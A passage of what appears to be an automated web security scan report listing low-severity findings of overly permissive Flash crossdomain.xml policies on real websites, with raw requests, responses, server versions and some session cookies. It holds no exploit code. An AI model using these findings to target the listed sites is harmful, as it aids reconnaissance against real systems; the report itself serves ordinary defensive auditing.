<allow-access-from domain="*.4wdandsportutility.com" />
<allow-access-from domain="*.4wheeloffroad.com" />
<allow-access-from domain="*.4wdandsportutility.com" />
<allow-access-from domain="*.atvrideronline.com" />
<allow-access-from domain="*.autobuyguide.com" />
<allow-access-from domain="*.automobilemag.com" />
<allow-access-from domain="*.automotive.com" />
<allow-access-from domain="*.camaroperformers.com" />
<allow-access-from domain="*.caraudiomag.com" />
<allow-access-from domain="*.carcraft.com" />
<allow-access-from domain="*.chevyhiperformance.com" />
<allow-access-from domain="*.circletrack.com" />
<allow-access-from domain="*.classictrucks.com" />
<allow-access-from domain="*.corvettefever.com" />
<allow-access-from domain="*.customclassictrucks.com" />
<allow-access-from domain="*.customrodder.com" />
<allow-access-from domain="*.dieselpowermag.com" />
<allow-access-from domain="*.dirtrider.com" />
<allow-access-from domain="*.europeancarweb.com" />
<allow-access-from domain="*.eurotuner.com" />
<allow-access-from domain="*.fourwheeler.com" />
<allow-access-from domain="*.gmhightechperformance.com" />
<allow-access-from domain="*.highperformancepontiac.com" />
<allow-access-from domain="*.hondatuningmagazine.com" />
<allow-access-from domain="*.hotbikeweb.com" />
<allow-access-from domain="*.hotrod.com" />
<allow-access-from domain="*.hotrodsbikeworks.com" />
<allow-access-from domain="*.importtuner.com" />
<allow-access-from domain="*.intellichoice.com" />
<allow-access-from domain="*.internetautoguide.com" />
<allow-access-from domain="*.jpmagazine.com" />
<allow-access-from domain="*.kitcarmag.com" />
<allow-access-from domain="*.lowridermagazine.com" />
<allow-access-from domain="*.minitruckinweb.com" />
<allow-access-from domain="*.modified.com" />
<allow-access-from domain="*.modifiedmustangs.com" />
<allow-access-from domain="*.moparmusclemagazine.com" />
<allow-access-from domain="*.motorcyclecruiser.com" />
<allow-access-from domain="*.motorcyclistonline.com" />
<allow-access-from domain="*.motortrend.com" />
<allow-access-from domain="*.motortrendenespanol.com" />
<allow-access-from domain="*.musclemustangfastfords.com" />
<allow-access-from domain="*.mustang50magazine.com" />
<allow-access-from domain="*.mustangandfords.com" />
<allow-access-from domain="*.mustangmonthly.com" />
<allow-access-from domain="*.newcar.com" />
<allow-access-from domain="*.off-roadweb.com" />
<allow-access-from domain="*.popularhotrodding.com" />
<allow-access-from domain="*.rodandcustommagazine.com" />
<allow-access-from domain="*.sportcompactcarweb.com" />
<allow-access-from domain="*.sportrider.com" />
<allow-access-from domain="*.sporttruck.com" />
<allow-access-from domain="*.stockcarracing.com" />
<allow-access-from domain="*.streetchopperweb.com" />
<allow-access-from domain="*.superchevy.com" />
<allow-access-from domain="*.superstreetbike.com" />
<allow-access-from domain="*.superstreetonline.com" />
<allow-access-from domain="*.truckinssuv.com" />
<allow-access-from domain="*.truckinweb.com" />
<allow-access-from domain="*.trucktrend.com" />
<allow-access-from domain="*.turbomag.com" />
<allow-access-from domain="*.turbomagazine.com" />
<allow-access-from domain="*.vetteweb.com" />
<allow-access-from domain="*.vwtrendsweb.com" />
...[SNIP]...

7.305. http://www.stumpsparty.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumpsparty.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumpsparty.com

Response

HTTP/1.0 200 OK
Content-Length: 118
Content-Type: text/xml
Content-Location: http://www.stumpsparty.com/crossdomain.xml
Last-Modified: Thu, 20 Jan 2011 13:33:35 GMT
Accept-Ranges: bytes
ETag: "c704aa3a6b8cb1:e49e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:08:28 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.stumpsparty.com" />
</cross-domain-policy>

7.306. http://www.tagomatic.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tagomatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tagomatic.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:41:41 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 18 May 2010 04:11:54 GMT
ETag: "334166-319-486d68aa47680"
Accept-Ranges: bytes
Content-Length: 793
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.dartmotif.net"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
<allow-access-from domain="*.doubleclick.com"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.dartmotif.net"/>
<allow-access-from domain="*.gstatic.com"/>
<allow-access-from domain="*.yieldmanager.com"/>
<allow-access-from domain="*.cpxinteractive.com"/>
<allow-access-from domain="*.adultfriendfinder.com"/>
<allow-access-from domain="*.atdmt.com"/>
...[SNIP]...

7.307. http://www.tbd.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tbd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tbd.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 25 Apr 2011 21:28:04 GMT
ETag: "4af836c-145-4a1c4e1fda100"
Content-Type: text/xml
Cache-Control: max-age=10
Expires: Wed, 04 May 2011 03:32:37 GMT
Date: Wed, 04 May 2011 03:32:27 GMT
Content-Length: 325
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.brightcove.com"/>
       <allow-access-from domain="*.omniture.com"/>
...[SNIP]...

7.308. http://www.thaivisa.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thaivisa.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thaivisa.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:48 GMT
Server: Apache
Last-Modified: Thu, 18 Sep 2008 07:16:25 GMT
ETag: "1ec89a-d1-457265cd9e440"
Accept-Ranges: bytes
Content-Length: 209
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.thaivisa.com" />
<allow-access-from domain="*.ookla.com" />
<allow-access-from domain="*.speedtest.net" />
</cross-domain
...[SNIP]...

7.309. http://www.thehawkeye.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thehawkeye.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thehawkeye.com

Response

HTTP/1.1 200 OK
Content-Length: 1158
Content-Type: text/xml
Content-Location: http://www.thehawkeye.com/crossdomain.xml
Last-Modified: Mon, 28 Mar 2011 20:37:52 GMT
Accept-Ranges: bytes
ETag: "31704e288edcb1:0"
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:28:41 GMT
Connection: close
Set-Cookie: NSC_DNTQ-OfxDNT=ffffffff09021f3145525d5f4f58455e445a4a423660;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.mediaspanonline.com" />
<allow-access-from domain="mediaspanonline.com" />
<allow-access-from domain="*.mediaspanonline.com" />
<allow-access-from domain="assets.mediaspanonline.com" />
<allow-access-from domain="*.nassauguardian.net" />
<allow-access-from domain="*.thenassauguardian.net" />
<allow-access-from domain="*.thenassauguardian.com" />
<allow-access-from domain="thenassauguardian.com" />
<allow-access-from domain="thenassauguardian.net" />
<allow-access-from domain="nassauguardian.net" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.cocentral.com" />
<allow-access-from domain="*.mediaspangroup.com" />
<allow-access-from domain="*.mediaspansoftware.com" />
<allow-access-from domain="*.fimc.net" />
<allow-access-from domain="*.firstmediaworks.com" />
<allow-access-from domain="*.firstmediaworks.net" />
<allow-access-from domain="*.firstmediaworks.org" />
...[SNIP]...

7.310. http://www.thehenryford.org/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thehenryford.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thehenryford.org

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 02:58:51 GMT
Content-Length: 218
Content-Type: text/xml
Last-Modified: Fri, 11 Apr 2008 20:00:09 GMT
Accept-Ranges: bytes
ETag: "35506a5e9cc81:10fe"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.octanedesign.com" />
</cr
...[SNIP]...

7.311. http://www.tna.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tna.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tna.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:06:45 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 26 Aug 2010 19:50:03 GMT
ETag: "760607-27c-48ebf4ddbf0c0"
Accept-Ranges: bytes
Content-Length: 636
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:06:45 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.fusetech.ca" />
<allow-access-from domain="*.aritzia.*" />
<allow-access-from domain="*.talulababaton.*" />
<allow-access-from domain="*.tbabaton.*" />
<allow-access-from domain="tbabaton.ca" />
<allow-access-from domain="*.communityapparel.*" />
<allow-access-from domain="*.tna.*" />
<allow-access-from domain="*.wilfred.*" />
<allow-access-from domain="wilfred.*" />
<allow-access-from domain="media.aritzia.com" />
...[SNIP]...

7.312. http://www.treetop.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.treetop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.treetop.com

Response

HTTP/1.1 200 OK
Content-Length: 129
Content-Type: text/xml
Last-Modified: Tue, 17 Mar 2009 21:54:32 GMT
Accept-Ranges: bytes
ETag: "76cd77f44aa7c91:2c52"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:06:50 GMT
Connection: close

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.peelinteractive.com" />
</cross-domain-policy>

7.313. http://www.ualmileageplus.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ualmileageplus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ualmileageplus.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:34:19 GMT
Server: Microsoft-IIS/6.0
Content-type: text/plain
Last-modified: Mon, 03 May 2010 12:31:16 GMT
Content-length: 405
Accept-ranges: bytes

<?xml version="1.0"?>
<!-- http://marketplace.edeal.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*.edeal.com" />
   <allow-access-from domain="*.at.edeal.com" />
   <allow-access-from domain="*.truition.com" />
   <allow-access-from domain="aws.truition.com" />    
   <allow-access-from domain="*.nhl.com" />    
   <allow-access-from domain="*.chase.com" />
...[SNIP]...

7.314. http://www.uniqlo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.uniqlo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.uniqlo.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 01 Dec 2010 23:34:00 GMT
ETag: "182919-349-bd5faa00"
Accept-Ranges: bytes
Content-Length: 841
Content-Type: text/xml
Date: Wed, 04 May 2011 03:38:30 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.uniqlo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.uniqlo.jp" secure="false" />
...[SNIP]...
<allow-access-from domain="10.202.3.28" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ebook.shufoo.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.shufoo.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sonicjam.jp" secure="false" />
...[SNIP]...
<allow-access-from domain="128.121.152.141" secure="false" />
...[SNIP]...
<allow-access-from domain="here.bascule.co.jp" />
<allow-access-from domain="imgsrc.vo.llnwd.net" />
<allow-access-from domain="*.imgsrc.co.jp" />
<allow-access-from domain="uniqlo.edgesuite.net" />
...[SNIP]...

7.315. http://www.universalclass.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.universalclass.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.universalclass.com

Response

HTTP/1.1 200 OK
Content-Length: 427
Content-Type: text/xml
Last-Modified: Fri, 17 Aug 2007 20:00:36 GMT
Accept-Ranges: bytes
ETag: "fc3d39479e1c71:5d9"
Server: Microsoft-IIS/6.0
UCW20: 3.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:18:48 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*.universalclass.com" />
<cr
...[SNIP]...
<allow-access-from domain="*.onlineclasses.com" />
...[SNIP]...
<allow-access-from domain="*.onlinecourse.com" />
...[SNIP]...
<allow-access-from domain="*.4uc.org" />
...[SNIP]...

7.316. http://www.usafootball.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usafootball.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usafootball.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:39 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
Set-Cookie: SESSa94fbadc2a7bd2ea6f231c4262a25eb1=r6vcg6e333fm54qk7hl5p60fv2; expires=Fri, 27-May-2011 07:00:59 GMT; path=/; domain=.usafootball.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 03:27:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Length: 273
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.usafootball.com" />
<allow-access-from domain="*.www.usafootball.com" />
...[SNIP]...

7.317. http://www.vh1classic.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vh1classic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vh1classic.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Thu, 10 Sep 2009 18:43:01 GMT
ETag: "47f490a-25c-4733d91abd740"
Accept-Ranges: bytes
Content-Length: 604
Content-Type: application/xml
Cache-Control: max-age=600
Date: Wed, 04 May 2011 02:18:13 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.mtvnservices.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mtvi.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.videovalve.tv" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mtvla.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mundonick.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mundonick-d.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mundonick-q.com" secure="false" />
...[SNIP]...

7.318. http://www.vimg.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vimg.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vimg.net

Response

HTTP/1.1 200 OK
Content-Length: 434
Content-Type: text/xml
Expires: Mon, 01 Jan 2018 08:00:00 GMT
Last-Modified: Fri, 19 Mar 2010 00:48:47 GMT
Accept-Ranges: bytes
ETag: "b6ac4aeffdc6ca1:0"
Server: Microsoft-IIS/6.0
X-Server-Name: Vanessa
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:48:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="deadline.com"/>
<allow-access-from domain="*.deadline.com"/>
<allow-access-from domain="hollywoodlife.com"/>
<allow-access-from domain="*.hollywoodlife.com"/>
...[SNIP]...

7.319. http://www.visitrenotahoe.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.visitrenotahoe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.visitrenotahoe.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:14:59 GMT
Server: Apache
Last-Modified: Fri, 16 Apr 2010 22:14:47 GMT
ETag: "374003-c9-48461f069c3c0"
Accept-Ranges: bytes
Content-Length: 201
Cache-Control: max-age=18000
Expires: Wed, 04 May 2011 07:14:59 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="www.visitrenotahoe.com" />
<allow-access-from domain="visitrenotahoe.com" />
<allow-access-from domain="*.mediaplex.com" />
</cross-domain-policy>
...[SNIP]...

7.320. http://www.webware.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.webware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.webware.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:50 GMT
Server: Apache
Vary: Host
Accept-Ranges: bytes
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Length: 3257
Keep-Alive: timeout=15, max=984
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.builder.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.*.com.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.pluggd.com"/>
<allow-access-from domain="*.userplane.com"/>
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.motifcdn2.doubleclick.net"/>
<allow-access-from domain="*.juegasgroup.com"/>
...[SNIP]...

7.321. http://www.weissresearchissues.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.weissresearchissues.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weissresearchissues.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:08:21 GMT
Server: Apache
Last-Modified: Wed, 24 Mar 2010 14:34:31 GMT
Accept-Ranges: bytes
Content-Length: 268
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.weissinc.com" />
<allow-access-from domain="*.weissresearchissues.com" />
<allow-access-from domain="*.ookla.com" />
<allow-access-from domain="*.speedtest.net" />
...[SNIP]...

7.322. http://www.wofford.edu/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wofford.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wofford.edu

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 24 Aug 2010 14:12:28 GMT
Accept-Ranges: bytes
ETag: "0ae16629643cb1:0"
